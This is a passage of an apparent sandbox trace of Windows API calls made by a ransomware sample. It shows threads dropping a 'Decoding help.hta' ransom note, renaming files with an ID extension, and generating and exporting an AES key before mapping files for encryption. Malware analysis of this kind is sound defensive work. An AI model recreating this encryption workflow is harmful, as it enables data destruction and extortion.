(hFileMappingObject=0x728, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x13a20000 Thread: id = 790 os_tid = 0x990 [0054.517] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0xf84fd30 | out: lpFindFileData=0xf84fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x2a8588d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671d70 [0056.121] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.121] FindNextFileW (in: hFindFile=0x671d70, lpFindFileData=0xf84fd30 | out: lpFindFileData=0xf84fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x2a8588d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.121] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.121] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.121] FindNextFileW (in: hFindFile=0x671d70, lpFindFileData=0xf84fd30 | out: lpFindFileData=0xf84fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x969a2800, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0x969a2800, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0x969a2800, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0xc5b25, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0056.121] lstrcpyW (in: lpString1=0x1133c310, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*" [0056.121] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 118 [0056.121] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" [0056.121] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\decoding help.hta")) returned 0x20 [0056.121] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0056.122] lstrlenW (lpString="cab1.cab") returned 8 [0056.122] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*" [0056.122] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 118 [0056.122] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0056.122] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0056.122] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0056.122] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.532] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x828 [0058.884] CreateFileMappingA (hFile=0x828, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x428 [0058.884] CryptAcquireContextA (in: phProv=0xf84fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xf84fcec*=0x10e283d8) returned 1 [0060.251] CryptGenKey (in: hProv=0x10e283d8, Algid=0x6610, dwFlags=0x1, phKey=0xf84fce8 | out: phKey=0xf84fce8*=0x10fbc618) returned 1 [0060.251] CryptExportKey (in: hKey=0x10fbc618, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xf84fbe4, pdwDataLen=0xf84fce4 | out: pbData=0xf84fbe4*, pdwDataLen=0xf84fce4*=0x2c) returned 1 [0060.251] MapViewOfFile (hFileMappingObject=0x428, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc5b20) returned 0x6c50000 Thread: id = 791 os_tid = 0xbe8 [0054.517] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x162dfd30 | out: lpFindFileData=0x162dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x2a8588d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671ab0 [0056.125] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.126] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x162dfd30 | out: lpFindFileData=0x162dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x2a8588d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.126] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.126] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.126] FindNextFileW (in: hFindFile=0x671ab0, lpFindFileData=0x162dfd30 | out: lpFindFileData=0x162dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc6500, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x50cc6500, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x50cc6500, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0xf36be, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0056.126] lstrcpyW (in: lpString1=0x9581ae0, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*" [0056.126] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*") returned 116 [0056.126] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" [0056.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\decoding help.hta")) returned 0x20 [0056.126] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0056.126] lstrlenW (lpString="cab1.cab") returned 8 [0056.126] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*" [0056.126] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*") returned 116 [0056.126] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0056.126] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0056.126] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0056.126] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.532] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f8 [0060.894] CreateFileMappingA (hFile=0x4f8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xdb0 [0060.894] CryptAcquireContextA (phProv=0x162dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 792 os_tid = 0x994 [0054.517] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*", lpFindFileData=0xcc8fd30 | out: lpFindFileData=0xcc8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6718b0 [0054.517] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.517] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0xcc8fd30 | out: lpFindFileData=0xcc8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.517] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.517] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.517] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0xcc8fd30 | out: lpFindFileData=0xcc8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="enu-dsk", cAlternateFileName="")) returned 1 [0054.517] lstrcmpW (lpString1=".", lpString2="enu-dsk") returned -1 [0054.517] lstrcmpW (lpString1="..", lpString2="enu-dsk") returned -1 [0054.517] lstrcmpiW (lpString1="windows", lpString2="enu-dsk") returned 1 [0054.517] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" [0054.517] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned 73 [0054.518] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\", lpString2="enu-dsk" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk" [0054.518] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0054.518] GlobalMemoryStatus (in: lpBuffer=0xcc8fd10 | out: lpBuffer=0xcc8fd10) [0054.518] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24dfebf0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7f8 [0054.520] CloseHandle (hObject=0x7f8) returned 1 [0054.520] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0xcc8fd30 | out: lpFindFileData=0xcc8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc84877a0, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc84877a0, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x3739a960, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x5b400, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSFrontendENU.dll", cAlternateFileName="")) returned 1 [0054.520] lstrcpyW (in: lpString1=0x97a23e0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" [0054.520] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned 73 [0054.520] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta" [0054.520] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\decoding help.hta")) returned 0xffffffff [0054.520] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0054.521] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xcc8fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcc8fcf8, lpOverlapped=0x0) returned 0 [0054.521] CloseHandle (hObject=0xffffffff) returned 0 [0054.521] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0054.521] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSTTSFrontendENU.dll") returned -1 [0054.521] lstrlenW (lpString="MSTTSFrontendENU.dll") returned 20 [0054.521] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" [0054.521] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned 73 [0054.521] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\", lpString2="MSTTSFrontendENU.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll" [0054.521] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll" [0054.521] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0054.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsfrontendenu.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsfrontendenu.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0054.521] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0xcc8fd30 | out: lpFindFileData=0xcc8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2c77e3, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2c77e3, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSLoc.dll.mui", cAlternateFileName="")) returned 1 [0054.521] lstrcpyW (in: lpString1=0x97a23e0, lpString2="\\\\?\\C:\\Program Files\\Common 